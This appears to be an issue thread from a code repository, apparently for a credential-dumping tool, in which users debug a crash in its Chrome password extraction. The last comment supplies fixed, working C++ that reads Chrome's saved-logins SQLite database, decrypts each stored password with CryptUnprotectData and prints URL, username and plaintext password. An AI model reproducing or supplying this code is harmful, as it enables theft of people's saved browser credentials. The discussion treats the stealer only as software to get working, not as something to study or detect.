Google Chrome Credentials Breaks after first attempt

[filipe-valadares]

Eveything run perfectly until it reached the second password form of Chrome, which crashes the software.
After removing a break point in the code, the software could reach the third password, showing only a Character in the URL form. After that, crashed again.

[maldevel]

Hi,
could you please send me the name of the source file and the exact code line the application crashes?

[Crash0v3r1de]

I imagine he/she is referring to iosfwd line 464
return (_CSTD strlen(_First));

After the first row in the for loop in libchrome.cpp my VS throws the exception when that line is hit. I'm stupidly new to c++ (usually code in c#) and i'm trying to break down the process but it appears this is causing the chrome issue and i don't know how to understand the whole process/function leading up to the actual error itself
Screenshot - http://prntscr.com/nqopyr

[maldevel]

Thx I will check it out.

[Crash0v3r1de]

i'll be monitoring this for any updates. I'm curious what the issue is and what the code change will be. Trying to learn c++ and the debugging system for something like this is basically nothing i can understand yet. I think it's related to sqlite but i'm probly wrong lol.

[Crash0v3r1de]

Just a random thing i found during more step by step debugging breaking down what the code does. It looks like when it's outputting the URL result char it cannot convert i think?
std::cout << "URL: " << results[cellPosition] << std::endl; hits the second time around and then throws the read access violation.

So for my second loop the URL cell position int is 6
int cellPosition = (rowCtr * columns);
which in the debugger returns "", which i would assume means null?
i've added an if(results[cellPosition] != nullptr) to check but it passes that validation.

I also was fooling around with try catch blocks and oddly enough those didn't catch it either, i feel like i'm missing something try to fix/find a fix for it.

This is the output before the binary crashes
URL: Γ9÷φ�
Username:`
EDIT: it will also sometimes show the correct URL in console but still will fail after username second loop around.

Sorry if this doesn't help but i figured i would share it ¯_(ツ)_/¯

[ContionMig]

The error seems to come from sqlite3_free_table(results); Removing it fixes it temporarily

[quantumcore]

The issue is fixed by moving sqlite3_free_table(results); outside the for loop.

for (int rowCtr = 1; rowCtr <= rows; ++rowCtr) {
			int cellPosition = (rowCtr * columns);
			std::cout << "URL: " << results[cellPosition] << std::endl;
			cellPosition = (rowCtr * columns) + 1;
			std::cout << "Username: " << results[cellPosition] << std::endl;
			cellPosition = (rowCtr * columns) + 2;
			

			if ((rc = sqlite3_blob_open(db, "main", "logins", "password_value", rowCtr, 0, &blob)) != SQLITE_OK) {
				sqlite3_close(db);
				return;
			}

			int len = 0;
			if ((len = sqlite3_blob_bytes(blob)) <= 0) {
				sqlite3_close(db);
				return;
			}

			if ((block = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, len)) == NULL) {
				sqlite3_blob_close(blob);
				sqlite3_close(db);
				return;
			}

			if ((rc = sqlite3_blob_read(blob, block, len, 0)) != SQLITE_OK) {
				HeapFree(GetProcessHeap(), 0, block);
				sqlite3_blob_close(blob);
				sqlite3_close(db);
				return;
			}

			sqlite3_blob_close(blob);

			DataIn.cbData = len;
			DataIn.pbData = (BYTE *)block;
			
			if (CryptUnprotectData(&DataIn, NULL, NULL, NULL, NULL, 0, &DataOut)) {
				DataOut.pbData[DataOut.cbData] = '\0';
				std::cout << "Password: " << DataOut.pbData << std::endl;
			}

			
		}

		sqlite3_free_table(results);